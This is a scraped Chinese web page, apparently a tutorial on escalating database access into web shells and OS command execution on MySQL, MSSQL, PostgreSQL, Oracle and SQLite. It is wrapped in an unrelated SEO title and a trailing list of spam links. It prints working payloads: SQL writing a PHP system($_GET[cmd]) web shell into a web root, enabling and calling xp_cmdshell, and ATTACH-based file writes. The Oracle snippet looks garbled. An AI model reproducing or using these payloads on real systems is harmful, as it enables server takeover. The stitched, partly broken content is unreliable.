当前位置: 首页 > news >正文

建造电商网站导购网站的seo怎么做

建造电商网站,导购网站的seo怎么做,西宁软件网站建设,上海响应式网站制作公司1. MySQL 条件 数据库用户需要具备高权限#xff08;如 FILE 权限#xff09;。数据库服务运行用户需要对目标目录有写权限。Web 服务器有可写目录#xff0c;且支持执行上传的脚本#xff08;如 PHP、JSP 等#xff09;。 原理 利用 MySQL 的 SELECT ... INTO OUTFIL…1. MySQL 条件 数据库用户需要具备高权限如 FILE 权限。数据库服务运行用户需要对目标目录有写权限。Web 服务器有可写目录且支持执行上传的脚本如 PHP、JSP 等。 原理 利用 MySQL 的 SELECT ... INTO OUTFILE 功能将恶意代码写入目标 Web 目录生成一个 Web Shell 文件。攻击者通过浏览器访问 Web Shell获得命令执行能力。 流程 确认 FILE 权限 SELECT * FROM mysql.user WHERE Usertarget_user;写入 Web Shell 到目标目录 SELECT ?php system($_GET[cmd]); ? INTO OUTFILE /var/www/html/shell.php;通过浏览器访问 Web Shell 执行命令 http://xxxxxx.com/shell.php?cmdwhoami 2. Microsoft SQL Server (MSSQL) 条件 数据库用户需要 sysadmin 权限。目标服务器启用了扩展存储过程 xp_cmdshell。数据库运行用户有命令执行权限。 原理 调用 MSSQL 的 xp_cmdshell 存储过程直接在操作系统中执行命令。 流程 确认是否启用了 xp_cmdshell EXEC sp_configure show advanced options, 1; RECONFIGURE; EXEC sp_configure xp_cmdshell, 1; RECONFIGURE;利用 xp_cmdshell 执行命令 EXEC xp_cmdshell whoami;通过命令的输出或回显获取执行结果。 3. PostgreSQL 条件 数据库用户需要对文件系统具有写权限。数据库支持使用 COPY 命令将数据写入文件。目标 Web 目录可写入文件并允许脚本执行。 原理 利用 PostgreSQL 的 COPY 功能将 Web Shell 写入目标文件系统。 流程 写入 Web Shell COPY (SELECT ?php system($_GET[cmd]); ?) TO /var/www/html/shell.php; 访问 Web Shell http://xxxxx.com/shell.php?cmdid 4. Oracle 条件 数据库用户需要 CREATE LIBRARY 权限。数据库运行用户需要访问操作系统。利用外部过程或 Java 存储过程。 原理 通过 Oracle 数据库的外部过程调用操作系统命令。使用 Java 存储过程执行系统级操作。 流程 创建外部库如 DLL 文件 CREATE OR REPLACE LIBRARY mylib AS /path/to/external/file;调用外部过程执行命令 DECLAREcmd VARCHAR2(1000); BEGINcmd : ls;DBMS_SCHEDULER.CREATE_JOB(cmd); END; 读取命令执行结果。 5. SQLite 条件 SQLite 本身无法直接与操作系统交互。必须结合其他漏洞如本地文件包含实现 Web Shell。 原理 利用 SQLite 的 ATTACH 或其他功能尝试将恶意数据写入特定目录。 流程 写入数据 ATTACH DATABASE /var/www/html/shell.php AS shell; 在 Web 服务器中访问生成的 Web Shell 文件。 总结表 数据库条件原理流程简述MySQLFILE 权限Web 目录可写写入 Web Shell 通过 SELECT ... INTO OUTFILE写 Shell - 访问 Shell - 执行命令MSSQLsysadmin 权限启用 xp_cmdshell使用 xp_cmdshell 直接执行系统命令开启 xp_cmdshell - 执行命令PostgreSQL写权限Web 目录可访问使用 COPY 写入 Web Shell写 Shell - 访问 Shell - 执行命令OracleCREATE LIBRARY 权限系统访问权限使用外部库或 Java 存储过程调用系统命令配置库 - 调用命令SQLite结合其他漏洞如文件包含写入恶意数据文件结合其他漏洞如 LFI访问写 Shell - 结合 LFI 执行
http://www.hkea.cn/news/14461535/

相关文章:

  • htm网站制作长沙建网站设计公司
  • 建设部网站 测绘规章酒店网站的建设
  • 广州做一个网站多少钱创新创意产品设计方案
  • 网络上市场推广seo用什么论坛引流
  • 平台网站的建设需求wordpress插件选项
  • 永川网站开发大连网络科技有限公司
  • 雅加达网站建设网站设计与建设书
  • 英孚做网络作业的网站秦皇岛网站公司
  • 网站建设如何建织梦后台生成网站地图
  • 北京超市网站建设临淄百度信息港网
  • asp 网站源码wordpress建站价格
  • 衡水网站联系电话公司网站建设管理办法
  • 温州网站维护工作长沙网页制作模板的网站
  • 阿克苏网站建设咨询深圳东门老街有什么好玩的
  • 有做外国人的零售网站吗基于php的图书管理系统论文
  • 社区网站 备案做企业网站为什么要服务器呢
  • 四川阿坝建设招标网站创新驱动发展战略方针
  • 旅行社网站 模板怎么看网站做没做推广
  • 广东建立网站织梦网站地图调用全站文章
  • 贵阳建站公司手机英文网站大全
  • 成都网站建设_创新互联手表二级市场网站
  • 如何对网站做优化昆明中国建设银行网站
  • 龙游建设工程信息网站wordpress加密版权
  • 重庆网络推广网站php网站建设课程作业
  • 广东移动手机营业厅网站网站建设需要金额
  • 高职院校优质校建设专栏网站互联网保险排名
  • 郑州做网站公司yookerseo教程免费分享
  • 阿坝州建设局网站刘志彬给网站划分栏目
  • 贸易公司网站设计html做网站自适应宽度
  • 长春企业做网站百度有做企业网站吗